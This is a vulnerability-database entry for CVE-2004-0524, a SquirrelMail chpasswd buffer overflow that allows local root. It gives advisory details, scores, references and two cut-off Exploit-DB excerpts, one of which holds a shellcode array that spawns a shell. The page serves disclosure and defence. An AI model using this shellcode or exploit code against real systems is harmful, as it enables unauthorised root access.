CVE-2004-0524
published 2004-08-06CVE-2004-0524: Buffer overflow in the chpasswd command in the Change_passwd plugin before 4.0, as used in SquirrelMail, allows local users to gain root privileges via a long…
PriorityP341critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
4.61%
90.5th percentile
Buffer overflow in the chpasswd command in the Change_passwd plugin before 4.0, as used in SquirrelMail, allows local users to gain root privileges via a long user name.
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
SquirrelMail - 'chpasswd' Local Privilege Escalation (Brute Force)
exploitdb·2004-08-25
CVE-2004-0524 SquirrelMail - 'chpasswd' Local Privilege Escalation (Brute Force)
SquirrelMail - 'chpasswd' Local Privilege Escalation (Brute Force)
---
/*
** PST_chpasswd_exp-v_b.c:
**
** Squirrelmail chpasswd local root bruteforce exploit
** Author:
** Bytes ||
** www ph4nt0m net
** Notice:
** v_b: Local bruteforce version
** v_R: remote bruteforce version
**
**
** Greatze: #ph4nt0m,#music@0x557
** All PST member,Grip2,Airsupply,Jambalaya,Ann,Paul,Happy...
** Thax: My GF(Luz),Oyxin,Winewind,Envymask,Eong,luoluo,GoGo(f0r ever)...
**
**
** -=-=-=-=-=-=-=-=-=-= !!![+PH4NT0M TEAM PRIVATE EXPLOIT+]!!! =-=-=-=-=-=-=-=-=-=-
**
** Date: 2004-04 # DO NOT DISTRIBUTE #
**
** You Must get account belong to Webmaster ,www or other webserver groups.
**
*/
#include
#include
#include
#include
#define NOP 0x90
#define Fuckpr0 "./chpasswd" /* you need modify it by yourself */
#def
Exploit-DB
SquirrelMail - 'chpasswd' Local Buffer Overflow
exploitdb·2004-04-20
CVE-2004-0524 SquirrelMail - 'chpasswd' Local Buffer Overflow
SquirrelMail - 'chpasswd' Local Buffer Overflow
---
/*
* 0x3142-sq-chpasswd.c
* Squirremail chpasswd buffer overflow.
*
* Tested on SuSE 9.
* The bug was found by Matias Neiff
* Coded by x314
* (c) 2004 Copyright by x314.
* All Rights Reserved.
*
* Greets: m0s krewz.
*
*/
#include
char shellcode[]=
"\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0"
"\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d"
"\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73"
"\x68";
int main(int argc, char *argv[])
{
char *env[2] = {shellcode, NULL};
int i;
long ret, *addr_ptr;
char *buffer, *ptr;
buffer = malloc(200);
printf("\n*** Squirremail chpasswd local root exploit by [email protected] ***\n\n");
if(argc != 2) {
printf("Usage: %s \n\n",argv[0]);
exit(0);
}
ret =
No writeups or analysis indexed.
http://marc.info/?l=bugtraq&m=108222863917958&w=2http://marc.info/?l=bugtraq&m=108311782032370&w=2http://secunia.com/advisories/11415http://www.securityfocus.com/bid/10166http://www.squirrelmail.org/plugin_view.php?id=117https://exchange.xforce.ibmcloud.com/vulnerabilities/15889http://marc.info/?l=bugtraq&m=108222863917958&w=2http://marc.info/?l=bugtraq&m=108311782032370&w=2http://secunia.com/advisories/11415http://www.securityfocus.com/bid/10166http://www.squirrelmail.org/plugin_view.php?id=117https://exchange.xforce.ibmcloud.com/vulnerabilities/15889
2004-08-06
Published